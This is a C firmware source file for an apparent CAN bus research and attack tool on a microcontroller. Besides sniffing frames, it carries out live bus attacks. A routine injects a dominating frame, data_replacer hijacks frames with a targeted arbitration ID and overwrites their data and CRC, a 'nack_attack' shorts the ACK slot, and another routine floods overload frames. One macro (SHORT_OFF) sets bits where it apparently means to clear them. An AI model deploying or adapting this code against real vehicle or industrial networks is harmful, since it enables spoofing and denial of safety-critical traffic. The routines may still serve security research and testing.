==> bitbane/CANT/reCANT_SW/source/CANT/can.c <==
#include <stdio.h>
#include "can.h"
#include <stdbool.h>
#include "fsl_pit.h"
#include "peripherals.h"
#include "fsl_iomuxc.h"
#include "usb.h"
#include "led.h"
#define SHORT_ON BOARD_INITPINS_CAN1_SW_PORT->DR |= 1 << BOARD_INITPINS_CAN1_SW_PIN
#define SHORT_OFF BOARD_INITPINS_CAN1_SW_PORT->DR |= ~(1 << BOARD_INITPINS_CAN1_SW_PIN)

void can_init()
{

    /* Enable interrupts from channel 0. */
    PIT_EnableInterrupts(PIT_PERIPHERAL, PIT_CHANNEL_0, kPIT_TimerInterruptEnable);
    /* Enable interrupts from channel 1. */
    PIT_EnableInterrupts(PIT_PERIPHERAL, PIT_CHANNEL_1, kPIT_TimerInterruptEnable);
    /* Enable interrupt PIT_IRQN request in the NVIC */
    EnableIRQ(PIT_IRQn);

    
    /* Set timer1 callback handler */
    timer1_callback_handler = NULL;

    /* Reconfigure CAN1 pins to GPIO with an interrupt on RX */
    gpio_pin_config_t Output_config = {
        .direction = kGPIO_DigitalOutput,
        .outputLogic = 0U,
        .interruptMode = kGPIO_NoIntmode
    };
    /* Initialize GPIO functionality on GPIO_AD_B1_08 (pin H13) CAN1_TX */
    GPIO_PinInit(GPIO1, 24U, &Output_config);
    IOMUXC_SetPinMux(IOMUXC_GPIO_AD_B1_08_GPIO1_IO24, 0U); 
    IOMUXC_SetPinConfig(IOMUXC_GPIO_AD_B1_08_GPIO1_IO24, 0x30B0U); 

    gpio_pin_config_t Input_config = {
        .direction = kGPIO_DigitalInput,
        .outputLogic = 0U,
        .interruptMode = kGPIO_IntRisingOrFallingEdge
    };

    /* Initialize GPIO functionality on GPIO_AD_B1_09 (pin M13) */
    GPIO_PinInit(GPIO1, 25U, &Input_config);
    /* Enable GPIO pin interrupt on GPIO_AD_B1_09 (pin M13) */
    GPIO_PortEnableInterrupts(GPIO1, 1U << 25U);

    IOMUXC_SetPinMux(IOMUXC_GPIO_AD_B1_09_GPIO1_IO25, 0U); 
    IOMUXC_SetPinConfig(IOMUXC_GPIO_AD_B1_09_GPIO1_IO25, 0x0130B1U); 
}

void can_poll()
{
    if(frame_done)
    {
        frame_done = 0;
        if(sniff_traffic)
        {
            char msg[50];
            sprintf(msg, "Arbid: %lx\r\n", arbid);
            write_string(msg);
            write_string("Msg: ");
            for(int i = 0; i < msg_len; i++)
            {
                write_int(message[i]);
                write_string(" ");
            }
            sprintf(msg, "\r\nCRC: %lx\r\n", can_rx_crc);
            write_string(msg);
        }

        /* After 128 frames, turn the LED on */
        if ((frames_seen & 0x000000FF) == 128)
        {
            CAN1_LED_On;
        }
        else if((frames_seen & 0xFF) == 0)
        {
            CAN1_LED_Off;
        }
    }
}

void can_sync()
{
    PIT_SetTimerPeriod(PIT_PERIPHERAL, PIT_CHANNEL_1, can_ticks_per_cycle >> 1);
    timer1_callback_handler = sync_callback;
    synchronized = 0;
    same_bits_count = 0;

    // Enable timer and interrupt
    PIT_StartTimer(PIT_PERIPHERAL, PIT_CHANNEL_1);

    write_string("Synchronizing CAN bus...");
    while(!synchronized);
    write_string("Done\r\n");

    // Enable the external interrupt on the RX pin
    EnableIRQ(GPIO1_GPIO_COMB_16_31_IRQN);
}

static void sync_callback(void)
{
    /* Check to see if we are getting a 1 */
    if((GPIO1->DR & CAN_RX_PIN) > 0)
        same_bits_count++;
    else
        same_bits_count = 0;

    if(same_bits_count >= 14)
    {
        synchronized = 1;
        can_timer_stop();
    }
}

static void sample_callback(void)
{
    uint16_t bit_read = 0;
    if (GPIO1->DR & CAN_RX_PIN)
        bit_read = 1;

    /* Check to see if this is a stuff bit */
    if (same_bits_count >= 5) /* This is a stuff bit or an error frame */
    {
        if(bit_read == last_bit) // If we're reading the same bit a 6th time, this is an error frame
        {
            bits_read = 255; // This will effectively end the processing for this message and we will start over with the next one
        }
        else // Different bit level is for a stuff bit
        {
            // But don't forget that stuff bits count for the 5 same levels in a row
            same_bits_count = 1;
            last_bit = bit_read;
        }
    }
        
    else /* Not a stuff bit */
    {
        bits_read++;

        /* Track consecutive bits */
        if(bit_read == last_bit)
            same_bits_count++;
        else
            same_bits_count = 1;
        last_bit = bit_read;

        /* Populate the correct item based on position */
        // bit 1 is SOF, ignore it
        if(bits_read >= 2 && bits_read <= 12)
        {
            arbid <<= 1;
            arbid |= bit_read;
        }

        // bit 13 remote transmission request
        else if(bits_read == 14)
            extended_arbid = bit_read;

        /* From here, message length is based on whether or not we have an extended identifier. */
        if(extended_arbid == 0 && bits_read > 14)
        {
            // bit 15 is reserved
            if(bits_read >= 16 && bits_read <= 19)
            {
                msg_len <<= 1;
                msg_len |= bit_read;
            }
            else if(bits_read >= 20 && bits_read < (20 + (8 * msg_len)))
            {
                message[msg_byte] <<= 1;
                message[msg_byte] |= bit_read;

                if(bits_read - 20 - (msg_byte * 8) >= 7)
                    msg_byte++;
            }
            else if(bits_read >= (20 + (8 * msg_len)) && bits_read < (35 + (8 * msg_len)))
            {
                can_rx_crc <<= 1;
                can_rx_crc |= bit_read;

                if(bits_read == (34 + (8 * msg_len))) // Last bit of the CRC
                {
                    /* There is no bit stuffing for the CRC delimiter, ACK slot, or ACK delimiter */
                    same_bits_count = 0;
                }
            }
            else if(bits_read == (35 + (8 * msg_len))) // This is the CRC Delimiter
            {
                if(nack_attack > 0)
                    timer0_callback_handler = short_on;
            }
            else if(bits_read == (36 + (8 * msg_len))) // This is the ACK slot
            {
                if(nack_attack > 0)
                    timer0_callback_handler = short_off;
            }
            // else if(bits_read == (37 + (8 * msg_len))) // This is the ACK Delimiter
            // else if((bits_read >= (38 + (8 * msg_len))) && (bits_read < (45 + (8 * msg_len)))) // End Of Frame bits
            // else if((bits_read >= (45 + (8 * msg_len))) && (bits_read < (48 + (8 * msg_len)))) // Inter Frame Segment TODO: Not presently accounting for overload frames
        }
        else if (bits_read > 14)
        {
            if(bits_read >= 15 && bits_read <= 32)
            {
                arbid <<= 1;
                arbid |= bit_read;
            }
            // bit 33 is remote transmission request
            // bits 34 and 35 are reserved
            else if(bits_read >= 36 && bits_read <= 39)
            {
                msg_len <<= 1;
                msg_len |= bit_read;
            }
            else if(bits_read >= 40 && bits_read < (40 + (8 * msg_len)))
            {
                message[msg_byte] <<= 1;
                message[msg_byte] |= bit_read;

                if(bits_read - 40 - (msg_byte * 8) >= 7)
                    msg_byte++;
            }
            else if(bits_read >= (40 + (8 * msg_len)) && bits_read < (55 + (8 * msg_len)))
            {
                can_rx_crc <<= 1;
                can_rx_crc |= bit_read;
                if(bits_read == (54 + (8 * msg_len))) // Last bit of the CRC
                {
                    /* There is no bit stuffing for the CRC delimiter, ACK slot, or ACK delimiter */
                    same_bits_count = 0;
                }
            }
            else if(bits_read == (55 + (8 * msg_len))) // This is the CRC Delimiter
            {
                if(nack_attack > 0)
                    timer0_callback_handler = short_on;
            }
            else if(bits_read == (56 + (8 * msg_len))) // This is the ACK slot
            {
                if(nack_attack > 0)
                    timer0_callback_handler = short_off;
            }
            // else if(bits_read == (57 + (8 * msg_len))) // This is the ACK Delimiter
            // else if((bits_read >= (58 + (8 * msg_len))) && (bits_read < (65 + (8 * msg_len)))) // End Of Frame bits
            // else if((bits_read >= (65 + (8 * msg_len))) && (bits_read < (68 + (8 * msg_len)))) // Inter Frame Segment TODO: Not presently accounting for overload frames
        }
    }
    /* Currently skipping the EOF Header */
    if((extended_arbid == 0 && bits_read >= (20 + 18 + (8 * msg_len))) ||
       (extended_arbid == 1 && bits_read >= (40 + 18 + (8 * msg_len))))
    {
        can_timer_stop();
        // Enable the external interrupt on the RX pin
        frame_done = 1;
        frames_seen++;
        same_bits_count = 1;
        bits_read = 1;
        last_bit = 0;
 
        // Enable the external interrupt on the RX pin
        EnableIRQ(GPIO1_GPIO_COMB_16_31_IRQN);

        if(end_of_frame_callback != NULL)
            end_of_frame_callback();
    }
}

void can_timer_stop()
{
    /* Disable the overflow interrupt and timer */
    PIT_StopTimer(PIT_PERIPHERAL, PIT_CHANNEL_1);

    /* Disable the callback */
    timer1_callback_handler = NULL;
}

void setCanBaudrate(long int baud)
{
    DisableIRQ(GPIO1_GPIO_COMB_16_31_IRQN);
    can_baud = baud;
    can_ticks_per_cycle = (PIT_CLK_FREQ / can_baud);

    /* Calculate the 1/2 cycle delay so that the sampling interrupt happens in the middle of the bit.
     * It takes appx 300ns to set up the initial interrupt, so we have that delay already */
    can_initial_delay = (can_ticks_per_cycle >> 1) - (300 / (1000000000 / PIT_CLK_FREQ));

    /* Edge timer interrupt correction calculation. This compensates for the time the EXTI interrupt takes to fire
     * for timer 0 that interrupts on each CAN edge, which is about 300 ns */
    can_edge_interrupt_delay = 300 / (1000000000 / PIT_CLK_FREQ);
}

static void arbid_killer()
{
    if(tx_bit_count <= 3) // First 4 zeros of arbid
        GPIO1->DR &= ~CAN_TX_PIN;
    else if(tx_bit_count == 4) // First stuff bit
        GPIO1->DR |= CAN_TX_PIN;
    else if(tx_bit_count <= 9) // Next 5 zeros of arbid
        GPIO1->DR &= ~CAN_TX_PIN;
    else if(tx_bit_count == 10) // Stuff bit
        GPIO1->DR |= CAN_TX_PIN;
    else if(tx_bit_count <= 15) // Last two zeros of arbid, no RTR, 11 bit id, and 0 reserved bit
        GPIO1->DR &= ~CAN_TX_PIN;
    else if(tx_bit_count == 16) // Stuff bit
        GPIO1->DR |= CAN_TX_PIN;
    else if(tx_bit_count <= 19) // First 3 bits of length
        GPIO1->DR &= ~CAN_TX_PIN;
    else if(tx_bit_count == 20) // Sending one byte
        GPIO1->DR |= CAN_TX_PIN;
    else if(tx_bit_count == 21) // First data bit
        GPIO1->DR &= ~CAN_TX_PIN;
    else if(tx_bit_count == 22) // Second data bit
        GPIO1->DR |= CAN_TX_PIN;
    else if(tx_bit_count <= 26) // 3-6 data bit
        GPIO1->DR &= ~CAN_TX_PIN;
    else if(tx_bit_count <= 28) // 7th and 8th data bit
        GPIO1->DR |= CAN_TX_PIN;
    else if(tx_bit_count == 29) // CRC is 0x3cd1
        GPIO1->DR &= ~CAN_TX_PIN;
    else if(tx_bit_count <= 33)
        GPIO1->DR |= CAN_TX_PIN;
    else if(tx_bit_count <= 35) 
        GPIO1->DR &= ~CAN_TX_PIN;
    else if(tx_bit_count <= 37)
        GPIO1->DR |= CAN_TX_PIN;
    else if(tx_bit_count == 38) 
        GPIO1->DR &= ~CAN_TX_PIN;
    else if(tx_bit_count == 39)
        GPIO1->DR |= CAN_TX_PIN;
    else if(tx_bit_count <= 42) 
        GPIO1->DR &= ~CAN_TX_PIN;
    else if(tx_bit_count <= 44)
        GPIO1->DR |= CAN_TX_PIN;
    else if(tx_bit_count == 45) 
        GPIO1->DR &= ~CAN_TX_PIN;
    else if(tx_bit_count == 46)
        GPIO1->DR |= CAN_TX_PIN;

    tx_bit_count++;
}

static void data_replacer()
{
    uint8_t bit = 1;
    /* We're going to key off the bit-keeping that we're doing in the 
     * sample_callback function in order to see where we are in the message and
     * to track any necessary bit stuffing. These variables are:
     *
     * same_bits_count - the number of same bits in a row we have seen on the bus
     * bits_read - the number of bits we have read
     * arbid - the current arbitration ID
     * last_bit - value of the last bit read on the bus
     */

    /* Check to see if we have received an arbitration ID and it matches the one we are attacking */
    if((bits_read >= 15) && (arbid == attack_arbid))
    {
        /* Check to see if we need to send a stuff bit */
        if(same_bits_count == 5)
        {
            bit = last_bit ^ 0x01;
            bit <<= data_replacer_force_recessive; // Set bit to two if we are forcing the recessive and transmitting a 1
        }
        /* Let the current transmitter send the RTR, IDE and reserved bits, then take over at the DLC */
        else if(bits_read >= 15 && bits_read <= 18)
        {
            bit = (data_replacer_len >> (18 - bits_read)) & 0x1;
            bit <<= data_replacer_force_recessive; // Set bit to two if we are forcing the recessive and transmitting a 1
        }
        /* Send the data */
        else if((bits_read >= 19) && (bits_read < (19 + data_replacer_len_bits)))
        {
            bit = (data_replacer_data[(bits_read - 19) >> 3] >> (7 - ((bits_read - 19) & 0x7))) & 0x01;
            bit <<= data_replacer_force_recessive; // Set bit to two if we are forcing the recessive and transmitting a 1
        }
        /* Send the CRC */
        else if((bits_read >= (19 + data_replacer_len_bits)) && (bits_read < (34 + data_replacer_len_bits)))
        {
            bit = (data_replacer_crc >> (33 + data_replacer_len_bits - bits_read)) & 0x1;
            bit <<= data_replacer_force_recessive; // Set bit to two if we are forcing the recessive and transmitting a 1
        }
        /* Send the CRC delimiter, ACK slot, ACK delimiter, and EOF */
        else if(bits_read >= 34 + data_replacer_len_bits)
        {
            bit = 1;
        }

        /* Set the calculated level */
        if(bit == 1)
        {
            GPIO1->DR |= CAN_TX_PIN;
            SHORT_OFF;
        }
        else if(bit == 2)
        {
            GPIO1->DR |= CAN_TX_PIN;
            SHORT_ON;
        }
        else
        {
            GPIO1->DR &= ~CAN_TX_PIN;
            SHORT_OFF;
        }
    }
}

void overload_frame()
{
    overload_frame_bit_counter++;

    /* Wait for the end of frame bits, then send six dominant bits */
    if (overload_frame_bit_counter > 8 && overload_frame_bit_counter < 15)
    {
        GPIO1->DR &= ~CAN_TX_PIN;
    }
    /* Wait for the first recessive bit we see */
    else if (overload_frame_bit_counter >= 15 && overload_frame_first_recessive_bit == 0)
    {
        GPIO1->DR |= CAN_TX_PIN; // Transmit a recessive ourselves
        if (GPIO1->DR & CAN_RX_PIN)
            overload_frame_first_recessive_bit = overload_frame_bit_counter;
    }
    /* Wait for 8 recessive bits to be transmitted */
    else if ((overload_frame_first_recessive_bit > 0) && 
             (overload_frame_bit_counter >= overload_frame_first_recessive_bit + 6))
    {
        /* Reset if we are sending more frames */
        overload_frames_sent++;
        if(overload_frames_sent < overload_frame_count)
        {
            overload_frame_bit_counter = 7; // We won't see the 7 EOF bits again 
            overload_frame_first_recessive_bit = 0;
        }
        /* Uninstall ourselves if we are done */
        else
        {
            // Enable the external interrupt on the RX pin
            EnableIRQ(GPIO1_GPIO_COMB_16_31_IRQN);
            timer0_callback_handler = NULL;
        }
    }
}

void overload_frame_eof()
{
    // Disable the external interrupt on the RX pin
    DisableIRQ(GPIO1_GPIO_COMB_16_31_IRQN);

    overload_frame_bit_counter = 0;
    overload_frames_sent = 0;
    overload_frame_first_recessive_bit = 0;
    timer0_callback_handler = overload_frame;
}
